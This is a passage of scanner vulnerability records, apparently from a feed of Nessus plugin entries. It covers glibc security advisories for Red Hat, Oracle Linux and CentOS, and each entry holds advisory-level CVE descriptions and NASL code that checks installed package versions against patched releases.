audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:13:09", "references": ["https://access.redhat.com/security/cve/cve-2011-1095", "https://access.redhat.com/security/cve/cve-2009-5029", "https://access.redhat.com/security/cve/cve-2011-4609", "https://access.redhat.com/security/cve/cve-2011-1071", "https://access.redhat.com/security/cve/cve-2011-1659", "https://access.redhat.com/security/cve/cve-2009-5064", "https://access.redhat.com/errata/RHSA-2012:0125", "https://access.redhat.com/security/cve/cve-2010-0296", "https://access.redhat.com/security/cve/cve-2011-1089", "https://access.redhat.com/security/cve/cve-2010-0830"], "pluginID": "57928", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 9, "reporter": "Tenable", "published": "2012-02-14T00:00:00", "title": "RHEL 4 : glibc (RHSA-2012:0125)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-11-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "id": "REDHAT-RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57928", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57928);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2012:0125)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0125\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0125\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:46", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-February/002604.html"], "pluginID": "68455", "description": "From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 6, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : glibc (ELSA-2012-0125)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68455", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# Oracle Linux Security Advisory ELSA-2012-0125 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68455);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"Oracle Linux 4 : glibc (ELSA-2012-0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002604.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:13:08", "references": ["http://www.nessus.org/u?04137bde"], "pluginID": "57923", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security 